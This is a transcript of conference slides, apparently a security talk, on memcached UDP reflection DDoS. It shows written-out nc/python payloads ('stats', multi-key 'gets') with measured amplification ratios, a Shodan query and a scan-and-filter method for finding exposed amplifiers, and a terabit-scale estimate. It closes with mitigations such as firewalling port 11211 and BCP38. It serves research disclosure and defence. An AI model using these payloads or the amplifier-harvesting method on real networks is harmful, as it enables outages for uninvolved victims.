Deluge - Power Of Community
Transcript of Deluge - Power Of Community
![Page 1: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/1.jpg)
How to generate 2TB/s reflection DDoS data flow via a family network
Deluge
![Page 3: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/3.jpg)
Why this talk?
▪ About DRDoS
▪ DRDoS by memcache
▪ DDOS the real world
▪ Mitigation and conclusion
![Page 4: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/4.jpg)
About DRDOSHow it works
Common type Reflection DDoS
1
![Page 5: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/5.jpg)
How DRDOS works
![Page 6: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/6.jpg)
How to measure
▪ PPS ( packets per second )
▪ BPS ( bits per second )
▪ BPS == Amplifiers * Amplification Factor ( 1 )
![Page 7: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/7.jpg)
Common type Reflection DDoS
Trends of Protocols Used for Reflection
![Page 8: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/8.jpg)
Frequency of Protocols Used for Reflection
UDP Reflection And Amplification Attacks Types and Percentage In Recente weeks. Data from 360 Netlab.
![Page 9: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/9.jpg)
Common type Reflection DDoS
Measure Amplification Factor
![Page 10: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/10.jpg)
Common type Reflection DDoS
![Page 11: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/11.jpg)
Tips to Increase BPS
▪ Common UDP service
▪ The biggest reflect parameter on service
▪ Increase server to send fake UDP packet
![Page 12: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/12.jpg)
MemcachedAbout memcached
The risk of Memcache
Exploit Memcached with fake UDP packet
2
![Page 13: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/13.jpg)
About memcached and risk
General-purpose High-performance Widely used
![Page 14: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/14.jpg)
Which case can cause a big reflection in memcached?
python -c "print '\0\x01\0\0\0\x01\0\0stats\r\n'" |nc -nvvu 10.105.16.119 11211 > /tmp/null
(UNKOWN)[10.105.16.119] 11211 (?) open^C sent 16, rcvd 1263
1263/16=78.94
![Page 15: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/15.jpg)
Memcached Reflection power
Insert dataimport memcachemc = memcache.Client(['10.105.16.119:11211'],debug=True)mc.set('xah',s,90000)
Test UDP read
565600/18=31422.22
![Page 16: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/16.jpg)
Deep in Memcached Reflection power
Max: send 18 rcvd 81620045344
Min:send 18 rcvd 38209921227
![Page 17: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/17.jpg)
python -c "print '\0\x01\0\0\0\x01\0\0gets a b c d e f g h j k l m n o p q r s t w v u x y a\r\n'" |nc -nvvu 10.105.16.119 11211 >/tmp/null
tcpdump -i eth0 udp port 11211 -w mem.pcap
28295168/63=449129.65
Deep in Memcached Reflection power
![Page 18: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/18.jpg)
python -c "print '\0\x01\0\0\0\x01\0\0gets a a a a a a a a a a a a a a a a a a a a a a a a a a…\r\n'“
python -c "print '\0\x01\0\0\0\x01\0\0gets a a a a a a a a a a a a a a a a a a a a a a a a a b…\r\n'"
Deep in Memcached Reflection power
![Page 19: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/19.jpg)
Exploit
Unauthorized
Inject big cache
UDPAmplificatio
n
DistributedCooperatio
n
![Page 20: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/20.jpg)
DDOS the worldUnauthorized Memcached
Small scale test
3
![Page 21: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/21.jpg)
107,900port:11211 product:"memcached"
Shodan
![Page 22: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/22.jpg)
In two or three columns
ScanPort scan with default port in Memcached. 11211( TCP & UDP)
GrabBanner grab with packet to identify the unauthorized Memcached
tcpdump -vv udp port 11211
FilterFilter out the unauthorized Memcached with reflection power
![Page 23: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/23.jpg)
In two or three columns
ScanPort scan with default port in Memcached. 11211( TCP & UDP)
Grab
Banner grab with packet to identify the unauthorized Memcached
tcpdump -vv udp port 11211
Filter
Filter out the unauthorized Memcached with reflection power
One Vulnerable Random to DDOS 500mb/s
![Page 24: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/24.jpg)
Video
![Page 25: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/25.jpg)
1=0.5 GBit/sJust “gets z z z”
??? Gbit/sHow about use “gets z z z z z z z z z z”?
Over 50,000After simple filter(at least)
![Page 26: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/26.jpg)
Memcached
Location Infomation
![Page 27: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/27.jpg)
The bandwidth is up to amplifiers:
max < 25000 * 100m = 2500000m = 2.384 T
Make a simple calculation
![Page 28: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/28.jpg)
Mitigation & conclusion4
![Page 29: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/29.jpg)
Memcached
Authorization
Properly configured
Asn Infomation
![Page 30: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/30.jpg)
Memcached
Location Infomation
![Page 31: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/31.jpg)
Memcached
Authorization
Properly configured
![Page 32: Deluge - Power Of Community](https://reader030.fdocuments.in/reader030/viewer/2022012714/61acf3b4f828ab12c04db964/html5/thumbnails/32.jpg)
Network Mitigation Measures
Firewall udp 11211
ISP never allow IP spoofing bcp38
Rate Limit inbound UDP source port 11211 traffic
Isolation ACL